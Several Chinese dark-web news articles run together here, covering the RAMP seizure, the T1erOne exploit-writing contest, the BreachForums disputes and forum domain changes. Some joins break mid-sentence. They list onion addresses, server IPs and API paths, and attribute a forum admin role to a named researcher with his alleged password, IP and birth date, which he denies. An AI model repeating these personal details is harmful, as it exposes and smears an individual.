2026年1月28日,美国FBI联合佛罗里达南区检察官办公室突袭并查封了俄罗斯暗网论坛RAMP(Russian Anonymous Marketplace,俄罗斯匿名市场)——这个从2021年底开始运营的俄语网络犯罪论坛。它提供Tor隐藏服务(rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd[.]onion)和明网镜像(ramp4u[.]io),可以在暗网与明网同步访问,比很多竞争对手的论坛更容易访问,也因此聚集了全球各地的黑客——从西方的网络犯罪分子到东亚的威胁行为者。
RAMP基于商业论坛软件XenForo 2.2.5搭建,设有出售网络访问权限、恶意软件、勒索软件合作、被盗数据,以及招聘犯罪自由职业者的专门版块。主版块与子版块的版块名称包含俄语、英语、中文,帖子标题也混杂俄语、英语和中文,显示出它的国际化程度。
最近,该暗网论坛的一份完整MySQL数据库泄露给了安全研究人员,其中包含从2021年11月到2024年1月的用户记录、1732个论坛主题帖、7707名注册用户、340333条IP日志记录、1899个私人对话和3875条私信。这份数据像X光一样,照亮了勒索软件生态系统的供应链运作方式。
Comparitech发布的分析报告称:“Comparitech独家获得了RAMP泄露的数据库。完整的MySQL转储文件包含用户记录、论坛帖子、私人消息、IP日志以及管理员活动,时间跨度从2021年11月到2024年1月。”
主要发现如下:
论坛活跃度从2022年第四季度的67个帖子低点激增至2023年第四季度的300个帖子,增幅达348%,表明在执法部门的干扰之后,论坛出现了大幅复苏。 RAMP论坛促成了向包括国防承包商、能源公司、银行、医院和政府机构在内的20多个国家的组织出售企业网络访问权限。 美国是头号目标:在标明国家的列表中,美国出现的比例高达40%。 一位单一的准入经纪人发布了41个不同的主题帖,出售进入企业网络的入口,其中包括一家年收入12亿美元的美国公司以及在南美和乌克兰的政府网络。 14个勒索软件即服务(RaaS)项目积极招募联盟成员,提供高达90%的赎金分成。 政府机构是受影响最大的行业(21家),其次是金融/银行业和科技/电信业(各11家)。 Comparitech表示:“本分析基于 RAMP 论坛 XenForo 安装的 MySQL 数据库转储。我们解析了原始 SQL 语句,从 xf_user(7,707 条记录)、xf_thread(1,732 条记录)、xf_post、xf_ip(340,333 条记录)、xf_admin_log、xf_conversation_master(1,899 条记录)和 xf_conversation_message(3,875 条记录)表中提取了结构化数据。” 分析总结道。“IP 地址从二进制格式解码,并根据已知的 ISP 分配进行地理位置定位。所有结论均基于数据库转储中的数据,尚未通过与实际来源的独立验证。”
访问权限市场:勒索软件攻击的“开门钥匙” RAMP上规模最大的版块就是“访问权限市场”(Access(SSH/RDP/VNC/Shell)),共有333个主题在出售被入侵企业网络的入口权限。这正是勒索软件攻击链的第一环——没有初始访问,就谈不上后续部署恶意软件。
最常见的访问类型是RDP(远程桌面协议),占59个主题帖,其次是VPN访问(22个)和SSH/Webshell(22个)。域管理员(Domain Admin)权限只有12个,但价格最高,因为它能直接控制整个网络。
访问类型分布(部分数据):
RDP:59个(43%),风险等级:致命 VPN(企业网关):22个(16%),致命 SSH/Webshell:22个(16%),高危 域管理员:12个(9%),致命 卖家最爱美国目标,占已明确国家列表的40%。其他热门国家包括欧盟各国、加拿大、巴西、印度、中国等。被针对的行业中,政府机构(含大使馆、军队)最多(21个),其次是金融/银行和技术/电信(各11个)。
真实案例里,一个卖家“inthematrix”一个人发了41个主题帖,其中包括一家年收入12亿美元的美国公司、南美和乌克兰的政府网络。还有韩国一家年收入160亿美元的大型企业、阿联酋电信(13亿美元)、丰田巴西工厂等高价值目标。
2022年初,市场以RDP为主;到2023年底,VPN访问大幅增加。这和2023年爆发的Cisco、Fortinet、Citrix等VPN产品严重漏洞密切相关。卖家“blackod”曾在2023年11月连续发布5个Cisco VPN访问的主题帖,覆盖美、澳、加、英,显示出自动化扫描和批量利用的痕迹。另一个帖子直接提到Pulse Secure的CVE-2019-11510漏洞,说明已知但未及时打补丁的漏洞仍是主要入口。
勒索软件即服务(RaaS):分成最高可达90% RAMP有专门的RaaS版块,60个主题用于招募“affiliate”(附属攻击者)。趋势很明显:早期分成是80/20(附属/运营商),到2023年中已变成90/10——附属攻击者能拿走100万美元赎金中的90万。这种高分成反映了市场对熟练攻击手的激烈争夺。
论坛上共出现14个RaaS项目,包括AvosLocker、Conti、Luna(Rust语言)、Knight 3.0、NoEscape、Bl00dy、KUIPER等。最令人担忧的是破解版构建工具和源代码泄露:LockBit 3.0 Builder、PHOBOS、Zeppelin2等。一旦工具泄露,任何中等水平黑客都能独立发动攻击,不需要加入任何RaaS联盟,也不用分成。
此外,论坛还出售破解版商业渗透测试工具:Cobalt Strike 4.8(合法年费5900美元)、Core Impact 21.3(年费2万美元以上)。这些专业级工具被零成本提供给犯罪分子,进一步降低了入门门槛。
恶意软件超市与犯罪人才市场 恶意软件版块有121个主题帖,涵盖:
漏洞与0-day:22个(SonicWall VPN RCE、Office 0-day、WinRAR RCE等) 加密器/FUD工具:17个 勒索软件:12个 RAT与后门:11个 信息窃取器:10个(LummaC2、Mars Stealer等) 僵尸网络:7个(一个声称能绕过主流加密货币交易所2FA的僵尸网络,售价2.
“暗网下/AWX”曾报道,在今年一月底FBI摧毁臭名昭著的RAMP论坛之后,一个允许交流勒索软件的新暗网论坛T1erOne悄然诞生,并宣称自己是RAMP论坛的替代品,为从事交易被盗数据、协调勒索软件攻击以及分发恶意软件的网络犯罪分子提供交流平台。只不过发展几个月后,该论坛人气依旧不愠不火。
为了吸引更多人访问,暗网论坛T1erOne诚邀对访问T1erOne感兴趣的研究人员加入。现在研究人员可以直接在该论坛上(tier1[.]life/register)注册为研究人员,研究人员账户享有特殊的有限访问权限。
除此之外,近日,该论坛还宣布了一场黑客征文大赛,旨在吸引全球顶尖的黑客和安全研究员分享他们的“实战干货”。该活动由1万美元(约合 7 万人民币)奖金支持,作为总奖金池,让人得以一窥这些暗网空间中知识共享和奖励的方式。
然而,这次竞赛引入了一种不同的动态,它类似于合法的网络安全生态系统,在那里研究人员记录发现并分享漏洞利用技术。根据论坛管理员发布的官方公告,帖子内容为:“大家好!我们很高兴宣布 T1erone [ARTICLE CONTEST #1 – 2026]。竞赛获胜者将获得奖金:第一名 – 5000美元,第二名 – 3000美元,第三名 – 2000美元,[总奖金池 10000美元]。文章提交从2026年4月13日开始,到2026年5月14日结束。”
该公告显示,这场暗网文章竞赛将于2026年4月13日至2026年5月14日举行,奖金金额奖金设置非常诱人:第一名5000美元、第二名3000美元、第三名2000美元,总奖金池为1万美元,据称由cry0勒索软件赞助。
黑客征文大赛征集高质量的黑客攻击技术文章、新型漏洞利用(Exploits)以及网络渗透技巧,邀请网友提交涵盖广泛高级主题的文章,这些主题包括:
通过React和Node.js中反配置缺陷实现的远程代码执行(RCE)。 对API和后端系统的命令注入攻击。 SaaS平台中的不安全直接对象引用(IDOR)漏洞。 现代模板引擎中的服务器端模板导入(SSTI)。 PHP和Java中的不安全反编译利用。 通过Markdown或Office文件渲染实现的客户端代码执行。 针对路由器和摄像头的固件攻击。 RouterOS及类似系统中的权限提升技术。 来自Cisco、MikroTik、Oracle和Ubiquiti产品的利用方法。 浏览器组件(如WebGPU和Blink)中的零日发现。 AI辅助的漏洞发现和逆向工程。 绕过AV和EDR安全系统的技术。 远程过程调用(RPC)机制的利用。 就背景而言,诸如RCE、IDOR和SSTI等漏洞允许攻击者执行任意代码或访问受限数据,而固件攻击则允许对硬件设备进行持久控制。同样,AV/EDR绕过技术旨在规避现代安全解决方案的检测。
T1erOne论坛为参与者制定了严格的指导方针。文章必须发布在指定的论坛板块,并包含特定前缀才能符合资格:提交必须发布在Articles板块,并带前缀“[Contest]”。文章链接必须在竞赛线程中分享,并附上参赛说明。
所有用户均有资格参与,无论注册日期或活跃度如何。严格禁止使用多个账号。此外,竞赛执行内容质量标准:文章必须原创,并基于作者的个人经验。提交内容必须全面涵盖所选主题,包括工具、技术和方法论,包含演示视频可能会提高获胜机会。最低长度要求至少为一页A4纸。不允许复制或转载材料,不鼓励过度使用填充内容。
尽管此类比赛在暗网论坛(如XSS, Exploit.in)其实有着广泛传统,2023年XSS论坛曾宣布举办[XSSware]软件项目竞赛,奖金2万美元。但T1erOne此次明确要求“编写 Exploit”作为核心评估标准,这意味着他们不仅是在收集知识,更是在筛选具有实战杀伤力的工具。对于安全工程师来说,这通常预示着在接下来的几个月里,可能会有新型的攻击手段或未公开的0-day漏洞利用方式从该论坛流向交易市场。
此类竞赛的存在可能令人惊讶,但它标志着暗网论坛内的一个更大趋势。除了非法市场和数据交易之外,这些平台还充当技术交流中心,会员们在这里记录和完善漏洞利用技术,关键区别在于知识应用的意图和背景。
本文只是揭示这些暗网生态系统的运作方式,“暗网下/AWX”不提倡参与此类活动,遵守法律是基本行为准则。
更多暗网新闻动态,请关注“暗网下/AWX”。
根据PwnForums论坛发布的耻辱墙公告以及X账号@IntCyberDigest的爆料,社交媒体和黑客社区的不同消息来源将保加利亚网络安全专家Angel Tsvetkov与BreachForums的管理员联系起来。BreachForums是买卖被盗数据的主要平台之一,当前主要有三个版本的BreachForums在运营,这里所指的BreachForums是Indra版本的BreachForums。
2026年3月15日,Indra的BreachForums暗网论坛突然无法访问,身份不明的管理员选择关闭了该网站,后来证实这是一起退出骗局。不过,当时网络反情报威胁调查联盟(CCITIC)声称对此事负责。
在Indra的BreachForums论坛关闭了十天后,论坛管理员之一“N/A”使用今年2月份的备份,通过新的域名BreachForums[.]sb重新启动该论坛,这次使用的管理员新化名是“Caine”。两天后,其他工作人员确认Caine就是之前卷款跑路的那个人,之后整个管理团队选择集体辞职。由于没有版主,“N/A”再次尝试出售该论坛的基础设施,此后大概是被DarkForums的Knox买走。
PwnForums称,这并非“N/A”首次犯案,在他担任管理员期间,“N/A”一直通过二级账户进行托管诈骗,兜售他并不拥有的数据库,收取款项却不交付任何产品。他还拖欠与他达成协议但从未履行义务的各方款项。
事件发展的时间线 2026年3月15日:BreachForums论坛无法访问,后经内部讨论,被描述为管理员主导的破坏活动。 2026年3月25日:据报道,BreachForums以“Caine”的化名重新启动,据称使用了之前的备份。 2026年3月27日:管理团队声称“Caine”和“N/A”是同一个人,整个管理团队集体辞职。 3月27日之后:据称管理员试图转移或出售论坛控制权。 被暗网论坛PwnForums钉上耻辱墙上的N/A究竟是谁 PwnForums已确认N/A为安吉尔·茨韦特科夫 (Angel Tsvetkov),他是一名保加利亚网络安全专家、渗透测试员和漏洞赏金研究员,拥有渗透测试和漏洞研究背景。他以其在识别和负责任地披露全球主要平台漏洞方面的工作而闻名。他在HackerOne和Intigriti等平台上享有盛誉,曾报告过影响大型企业的漏洞。他的工作主要集中在Web应用程序安全、漏洞发现和对抗性测试方面。
PwnForums称,Angel Tsvetkov是一位认证的道德黑客,HackerOne会员,曾因负责任的信息披露而获得哈佛大学、福特汽车公司、博世、BBC和OLX等多家企业机构的致谢,并曾荣获新闻媒体BBC和安全公司ESET的多项嘉奖。
然而,他表面上是一名白帽黑客,实际上却运营着最大的数据交易论坛,他同时是暗网论坛BreachForums的管理者,对论坛用户进行托管诈骗,两次卷款潜逃,并试图出售一个并非属于他的论坛。事实证明,道德黑客“负责任的信息披露”是有选择性的。
真实身份是如何关联出 PwnForums称,该归因得到了许多技术证据的支持,例如个人帐户和非法活动之间重复使用IP地址和登录密码,并得到@IntCyberDigest等X用户的认可。
从邮箱进行关联,Angel Tsvetkov一个常用的匿名邮箱为[email protected],常使用用户名SecPentester1337与secpente123,在RaidForums、Cracked.to、Dedicatet.com和Altenen等多个网络犯罪论坛注册了账号,填写的出生日期为1993年1月28日,另外在RaidForums论坛上还有一个用户名Vojilion9292与同一邮箱关联。
此外,[email protected]邮箱还关联了一个Twitter账号,注册于2018年9月29日,账号名为“Peter”,用户名为@Peter00111Peter,所在地为保加利亚,个人简介为:“渗透测试/漏洞猎手/道德黑客”。此人在多个正常论坛上使用多个名字,所有名字都与同一个电子邮件地址关联,所有地址都指向保加利亚普罗夫迪夫。
从密码进行关联,N/A的论坛账户密码被破解出来是“Awdawd123!”,然而有趣的是,Angel Tsvetkov个人网络安全咨询公司的官方商务邮箱[email protected]也反复使用同一个密码。
PwnForums感叹,这位获得认证的道德黑客、HackerOne会员、曾为多家机构提供密码安全咨询的人士,竟然在犯罪论坛账号和自己的商务邮箱中重复使用同一个密码。
从IP进行关联,N/A曾使用过的IP地址中有一个是78.130.187.42,该IP地址曾用于登录RaidForums和Cracked等论坛,该IP地址的地理位置位于保加利亚普罗夫迪夫。
无语的是,N/A曾联系PwnForums吹嘘其在该论坛植入后门并上传了一个名称为nike-sh.txt的文件,后该论坛管理员查看nike-sh.txt的访问日志,有且仅有一个IP:78.130.187.42,PwnForums认为Angel Tsvetkov通过自己的家庭IP地址访问了这个文件。
道德黑客Angel Tsvetkov驳斥了这些指控,称其“不实” 然而,保加利亚网络安全专家安吉尔·茨韦特科夫(Angel Tsvetkov)在接受采访时,断然否认了有关他是知名网络犯罪论坛BreachForums管理员的指控。茨韦特科夫称,散布的数据“是虚假的,而且极具破坏性”,并声称这些数据是基于“来自与网络犯罪相关的来源的未经证实的说法”。
当被直接问及他与该平台的所谓关联时,这位道德黑客坚称他没有参与BreachForums论坛的管理或运营,并否认拥有与网络犯罪活动相关的账户或化名。他表示:“我与相关人员没有任何关系,也从未在这些论坛担任过管理员或任何类似职务。”
关于他的身份与网络安全社区内这些活动之间的关联,这位专家指出,他并不清楚第三方是如何在未经授权的情况下使用他的数据的,并澄清说他目前正在分析情况。“我不知道第三方是如何在未经我授权的情况下在这个论坛上使用我的身份和数据的,”他表示。
这位专家在最初的沟通中坚称,已发布的信息“并不反映现实”,并警告说,信息的传播可能会产生影响。
“由于这篇文章的发表,有关我的虚假信息正在传播,执法部门和其他第三方也能看到这些信息,”他指出。
BreachForums论坛是一个为黑客及网络犯罪分子提供买卖被入侵数据库、黑客工具以及分享网络犯罪知识的暗网平台。与BreachForums论坛相关的各种戏剧性事件层出不穷,而且愈演愈烈。尽管屡遭执法部门的打击,偶尔还会发生内部冲突,但专注于买卖数据泄露的论坛仍然不断涌现。
“暗网下/AWX”梳理了近期Indra的BreachForums的变迁,在其关闭BreachForums之后,BreachForums[.]sb经过了几轮变化,先是被@Caine持有并继续运营,之后该论坛的管理团队集体退出。后明网域名BreachForums[.]as与BreachForums[.]sb被DarkForums的Knox买走,而据称是冒牌的Shinyhunters又开设了一个新明网域名BreachForums[.]ai来运营新版本的BreachForums。
Indra的BreachForums的工作人员集体辞职 @paw(@pine)在BreachForums[.]sb发布公开声明表示,BreachForums[.]sb的6名工作人员(@pine、@Loki、@888、@Tanaka、@paw、@Addka72424)已辞职,并声明:“请勿信任任何新出现的或现有的克隆站点,BreachForums这个名字已经不复存在,且永远不会回归。”
对此,在Telegram上假冒Shinyhunters的管理员@Caine声称,旧论坛的工作人员退出,是因为“勒索”。这些版主要求以1000美元的门罗币作为报酬,以补偿他们所做的一切工作。在被他拒绝后,他们选择了离开。而论坛将会组建新的工作人员团队。
BreachForums[.]as与BreachForums[.]sb显示了新的提示信息 “暗网下/AWX”尝试访问BreachForums[.]as与BreachForums[.]sb这两个明网域名,两个网站均显示相同的界面UI风格,一眼可以看出显然属于同一个所有者。
BreachForums[.]as网站展示了BreachForums[.]sb的明网域名与暗网域名:
BreachForums[.]sb则称,BreachForums现已完全由Knox(knox.hn)掌控。所有数据(包括最新的数据库和源代码)均已得到妥善保管。不再有混乱和诈骗,不再有不确定性——一切现已实现集中管理。请勿信任任何克隆站点。并提供了Telegram联系方式。
上周重启的一个新BreachForums论坛 周一,一名自称是勒索组织ShinyHunters成员的人宣布重启运营一个新的的BreachForums论坛(BreachForums[.]ai)。但一位与ShinyHunters官方频道有关联的人士表示,该组织与BreachForums的任何重启都毫无关系。他们表示:“我们与那个论坛没有任何关系。自从2025年10月10日被FBI查封后,我们就再也没有重启过它。”
本周重启的BreachForums论坛是“暗网下/AWX”前期介绍的Indra的BreachForums论坛的延续,上个月,Indra的BreachForums论坛的“基础设施,包括完整的数据库和源代码”,被“直接从其托管服务器”黑客入侵,并以1万美元的价格出售。新BreachForums论坛管理员(化名“x”)表示,前任管理员“N/A”得知此事后“惊慌失措,带走了能带走的东西,然后立即离开,没有通知社区”,之后“数据库就落入了不明人士手中”。
这一惊慌失措的说法似乎指的是3月16日发布在论坛旧版本上的一条公告,该公告宣布“BreachForums已死”,并正在寻找新的管理团队。公告表示:“我们现在正在寻找一位负责任的个人或团体,愿意接管论坛的领导权并继续提供支持。”
除了ShinyHunters的官方否认之外,安全研究人员还详细列举了“x”的说法中的矛盾之处,暗示其内容不实,并表示一些合法的BreachForums前运营者似乎正在注册多个BreachForums域名,以阻止类似的重启声明出现。
ShinyHunters表示,此次重启是利用先前泄露的数据发起的一系列BreachForum虚假论坛中的最新一起。该组织的一名成员说道:“其他威胁行为者能够恢复一个外观相似的合法论坛,包括重新导入旧用户数据,其中也包括我自己的ShinyHunters账户。”
IntelOpsV3称冒牌SH推出的BreachForums论坛又是一个冒牌货 暗网情报研究者@IntelOpsV3称,在Indra关闭其BreachForums并实施“卷款跑路”的时候,一个冒牌的SH(Shinyhunters)带着另一个冒牌的BreachForums(BreachForums[.]ai)出现了。于是,几乎在同一时间,至少有3个一模一样的网站,都声称自己是真正的BF。但不知道这些所谓BreachForums能运营多久。
新BreachForums论坛使用了暗网域名:http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd[.]onion
@IntelOpsV3提醒,其正在密切关注所有新的BF克隆站点,请谨慎对待所有这些新克隆站点。因为原BreachForums的PGP密钥、网站代码和数据库都已泄露,是时候让Breachforums这个名字长眠了。
@IntelOpsV3称,这是新的BF团队,可以看到他们在TG上假扮成“Shinyhunters”,他们声称自己是唯一的正宗BF,他们还发布了一则警告,称其他克隆站点均为假冒。这个新冒出的BreachForums克隆站点由doxeur、kiroshell和breach3d所有。breach3d就是那个发布假Dell数据库的冒牌Shinyhunters。
但可惜的是,SLSH已经发布了BFv5数据库,并指认他们是冒牌货。真正的SLSH称:“目前所有的论坛都是假的 [ .sb .ac .fi .bf .us 等],如果它们继续存在,我们将泄露所有BF的备份。因为我们掌握了所有MyBB 1.8版本的漏洞利用代码。”
@IntelOpsV3称,这个论坛是假的。这个论坛的ShinyHunters是个冒牌货。他们冒充IntelOps、Pine、Loki等组织,正如你们从我们的推特帖子中看到的,这个论坛里充斥着各种角色扮演。
BreachForums[.]ai的管理员“x”发布公告驳斥@IntelOpsV3 BreachForums[.]ai的管理员“x”于4月2日发布公告进行回应,并澄清该论坛的现状。“x”表示,他们没有导入旧BreachForums的SQL数据库,并不意味着他们是蜜罐(honeypot)或退出骗局(exit scam)。他自称这是一个全新的开始,这是BreachForums的官方延续。并请大家在做出假设前,先进行适当的研究,不要基于不完整的信息下结论。
公告表示,他们理解大家的怀疑,但事实不会改变。一旦论坛完全开发并稳定下来,他们将对克隆站点采取行动。“x”称,一些来源(如 Twitter 上的 IntelOps (@intelopsv3))散布了虚假信息,声称其是退出骗局。这些说法是错误的。IntelOps有历史性地不经查证就发布信息,并经常误报或歪曲细节。
“x”称,他们鼓励大家保持信息灵通、核查事实,并避免匆忙下结论。他们不是蜜罐/退出骗局。
公告表示,如果是蜜罐,他们会尝试修改MyBB源代码来尽可能记录用户的信息。相反,他们移除了IP记录,并用自定义构建的垃圾邮件预防系统取而代之。即使FBI或任何执法机构查封后端服务器也找不到任何有用的东西。
“x”宣称自己的VPS是完全加密的,用户的隐私是优先事项。
SLSH冒牌者究竟是谁 独立安全研究人员Ryan Moran(@rmoskovy)表示,在对这位自称“ShinyHunters”冒牌者进行分析时,我使用一个假账号通过Telegram向其发送消息,声称需要向“Rey”(一名与SH/SLSH有关联的威胁行为者)偿还一大笔钱,并要求对方提供“Rey”的联系方式。
然而,对方非但没有提供“Rey”的联系方式,反而要求@rmoskovy直接向其汇款。当进一步追问时,对方发来了一个拼写错误的账号,该账号是“Rey”真实用户名的拼写变体:
2026-02-26 -> Qilin 2026-02-26 -> Rey 2026-02-20 -> Qiliin 2026-01-24 -> XiaoBtc ( MBTC ) 2025-12-24 -> MBTC 2025-12-24 -> Crimesite 2025-11-08 -> Bjorka 2025-11-04 -> NinjaBoi6890 2025-10-31 -> SkyHunters 2025-10-25 -> Asley 2025-09-10 -> Kimbo 2025-06-09 -> Bebale Office 2025-05-15 -> Lesley
最近几天,网络安全圈和暗网监控平台纷纷爆出猛料,长年盘踞在俄罗斯网络犯罪头部的XSS论坛(原xss[.]is)在被国际联合执法行动打击数月后,正在开始一场大规模的基础设施迁移。暗网监控账户Daily Dark Web和Dark Web Informer相继在社交媒体X上发布预警,指出臭名昭著的俄罗斯暗网论坛XSS已经开始引导用户访问其新明网域名XSS[.]ac,并同步更换了暗网域名。
作为一个从2013年就开始活跃的老牌社区,XSS的前身是著名的 DaMaGeLaB。根据维基百科XSS.is条目的介绍,它不仅是黑客们交流漏洞、买卖 0-day 的地方,更是勒索软件(Ransomware)开发者寻找合作伙伴、招募分销商的核心枢纽。
2025年7月,“暗网下/AWX”曾经报道,法国警方与乌克兰同行和欧洲刑警组织合作逮捕了XSS[.]is的其中一名主要管理员,并查封XSS[.]is主域名。然而,执法行动并没有摧毁XSS[.]is包括服务器在内的基础设施,其在俄罗斯的庇护下依然活着,备用明网域名XSS[.]as与.onion网站依然可以访问。
基础设施迁移背后的技术博弈 在被执法机构打击后,在过去的几个月里,XSS论坛的基础设施一直处于不稳定的状态,XSS论坛的管理员一直在试图优化其反爬虫和反 DDoS(分布式拒绝服务攻击)策略。
正如“暗网下/AWX”曾介绍,XSS论坛在被警方打击后,虽然XSS[.]is域名显示了查封通知,但备用明网域名xss[.]as、.onion网站(xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid[.]onion)和位于thesecure[.]biz的Jabber服务仍在线运行。对于这种级别的网络犯罪枢纽,保护后端数据库的安全性是重中之重,因为后端基础设施被警方掌握,所有未加密的私信和交易记录都可能成为抓捕黑客的铁证。
更换全新的明网域名、暗网域名,也许是为了保护后端基础设施的安全,这反映了网络犯罪团伙为维持韧性并规避干扰所做的持续努力。
经本站(anwangxia.com)测试,目前,其原先的明网域名XSS[.]as、暗网域名(xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid[.]onion)均无法正常访问,仅可使用全新域名进行访问。
经查询Whois信息,新的明网域名XSS[.]ac注册于2016年3月10日,ac域名是英国海外领土阿森松岛的顶级域名(TLD)后缀。目前, 新明网域名XSS[.]ac使用了云服务商Cloudflare的解析中转服务。新的暗网域名几乎同一时间推出,域名为:https://xssac4uqtauxumkktnp3knz2ag7qcb3efmb66mokjg5fcqhzvilgwfid[.]onion
XSS未来能否继续活在俄罗斯的庇护下 虽然XSS试图通过更换域名来“续命”,但现实情况并不乐观。随着国际执法合作的加强,尤其是针对暗网基础设施的协同打击,这类论坛的生存空间正在被极限压缩。尽管有传言XSS论坛在俄罗斯的庇护下才能发展如此壮大,但有Leakbase的前车之鉴在,也许俄罗斯该打击还是要打击。
另外,在黑客圈子里,信任是比比特币更珍贵的货币。频繁的宕机、域名的临时变更,以及关于管理员可能被“渗透”的传言,正在让XSS的核心用户流向其他新兴平台,比如DamageLib。如果XSS无法证明其新域名的安全性,或者在基础设施管理上继续表现出疲态,这个曾经的“黑客圣地”很可能会步其前辈的后尘,最终走向崩塌。
更多暗网新闻动态,请关注“暗网下/AWX”。
RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛,提供被盗数据发布与交易的平台。近些年,在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下,几个暗网数据泄露论坛被打击了多次。
目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩:两个版本的BreachForums(Indra的BreachForums与Hasan的BreachForums)、BreachForums的最大竞争对手DarkForums,这些论坛除了面临竞争对手的挑战,还得面对在执法机构的查封压力。
近期,执法机构采取密集行动,查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应,启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。
Indra的BreachForums的明网域名更迭 2025年12月,在多个版本的BreachForums被执法机构摧毁后,Indra推出了新的BreachForums论坛,明网域名为breachforums[.]bf。
2026年2月4日,breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击,被暂停解析,暂停期间,Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名,并恢复使用了bf域名,随即jp域名被放弃使用。
2026年2月,安全研究人员多次研究出breachforums[.]bf的真实IP,分别为:95.129.233.76、185.129.102.34、31.172.87.150。
2026年2月14日,breachforums[.]bf域名再次被暂停解析,这次疑似是真被执法机构查封,并同时查封了breachforums[.]jp域名。
同日,Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as,并发布公告称,此次纯属注册商单方面暂停服务,与BreachForums内部运营无关,系统安全状态完好无损。未发生任何安全事件,未出现数据泄露,其基础设施、服务器及数据均未受影响。
Hasan的BreachForums的明网域名更迭 2026年1月,原BreachForums的管理员HasanBroker推出了另一个新的BreachForums,明网域名为breachforums[.]cz。2026年2月12日,有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。
2026年2月20日,breachforums[.]cz域名被执法机构查封,虽然依然能打开,但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后,Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。
DarkForums的明网域名更迭 2025年,暗网出现一个新的数据泄露论坛DarkForums,成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。
安全研究人员分析出了darkforums[.]st背后的IP:185.178.208.177,185.11.145.145, 185.11.145.254,185.196.9.155,85.208.156.120。
2025年12月,DarkForums启用新的明网域名darkforums[.]io,2026年1月,有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日,darkforums[.]io域名被执法机构查封,无法访问。
2026年2月4日,darkforums[.]io域名被查封后,DarkForums启用明网域名darkforums[.]me为主域名,该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”:
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
All previous domains and mirror links have been permanently disabled by the providers and are no longer active.
Please update your bookmarks. The only official addresses going forward are:
Clearnet: https://darkforums.me
Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion
We will announce and list any new mirrors here as they are added.
“暗网下/AWX”前期报道,臭名昭著的俄罗斯暗网论坛RAMP已经被FBI查封,RAMP曾是允许讨论勒索软件的暗网论坛,受到勒索软件团伙的欢迎。最新情报显示,RAMP的替代品已经出现,新暗网论坛的名称为“T1erOne”(也被称为TierOne、t1eron3、Tier1),可以同时通过暗网和明网进行访问。
近日,有安全研究人员club1337(@club31337)发布推文表示“Ramp已死,TierOne万岁”,并给出了新的T1erOne网站的暗网与明网域名。“暗网下/AWX”对该推文进行了核验,确认T1erOne网站的暗网与明网域名均可以访问:
T1erOne的暗网域名:jprrin6bqe3flvtpyxkt4zsmzc3u6vvn7ahgtcbul224w3xn4h3gawid[.]onion
T1erOne的明网域名:t1eron3[.]vip
Ramp is dead. Long live TierOne.https://t.co/akRDXrnJvahttps://t.co/dm8re9gWcU pic.twitter.com/pEh2aUb78M
— club1337 (@club31337) February 12, 2026 “暗网下/AWX”尝试访问T1erOne论坛,发现该网站主要提供了登录和注册功能。打开该网站,显示了一个简洁的登录界面,包括用户名、密码输入框,以及注册链接,没有复杂的交互或可见的外部资源加载。可以明确的是,与常规暗网论坛不同,新的T1erOne论坛并非使用常见的开源PHP论坛程序如phpBB、MyBB或SMF等进行搭建,可能系背后的管理员独立开发。
初步分析,T1erOne论坛采用了前后端分离的网站架构,还使用了Socket.IO技术来实现实时双向通信。其明网页面使用了Cloudflare的CDN服务,这可能为执法部门找到其背后的真实服务器IP提供便利。
T1erOne论坛注册不需要邮箱验证,但注册该网站以后,需要管理员进行认证,访问所有页面均跳转提示:
Этот форум только по закрытому входу. Чтобы попасть, надо скинуть свои другие форумные акк (Рехаб, хсс, эксплойт) или заплатить 450$ на БТЦ / XMR кошелёк. Message an admin | Напиши админу
(本论坛为私密论坛。如需访问,您必须发送您的其他论坛账号(Rehab、XSS、Exploit)或向BTC/XMR钱包支付450美元。联系管理员 | 给管理员写信。)
本站(anwangxia.com)经过对页面的解析,发现了其后端的部分API接口如下:
/api/auth/register /api/auth/login /api/public/banners/image/2 /api/auth/me /api/public/settings /api/notifications /api/messages/unread-count 安全研究人员认为T1erOne与此前RAMP的活动关联,并正在通过新的T1erOne论坛监控该组织,这表明网络犯罪分子的攻击行为不回停歇,勒索软件的侵扰仍将继续。T1erOne论坛接下来将如何发展以及会不会步RAMP后尘,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
一提暗网,好多人脑子里还是老一套:黑市、贩毒、雇佣杀手啥的,电影看多了。但对我们这些做威胁情报的来说,它更像一个乱哄哄的地下集市,各种角色混在一起,信息流动快得惊人。到了2026年,暗网的各个角落已经碎片化得不行了——没有哪个暗网论坛能一统江湖,取而代之的是好几个各有专长的社区。有些专供新手混,有些是老鸟交易重型货色的,还有些纯粹是情报交换站。想知道你的公司数据会不会哪天被挂出来卖?得先搞清楚这些地方的门道。
一、Dread:地下世界的“风向标” Dread还是那个Dread,暗网里最像Reddit的存在。2026年了,它依旧是很多人每天必上的地方——不卖东西,主要就是聊。
这里什么话题都有:新漏出来的数据库谁有?哪个勒索团伙又在吹牛?某个工具是真神器还是骗钱的?诈骗犯被同行曝光的帖子也能刷屏。氛围有点像微博热搜,但全是黑灰产的版本。
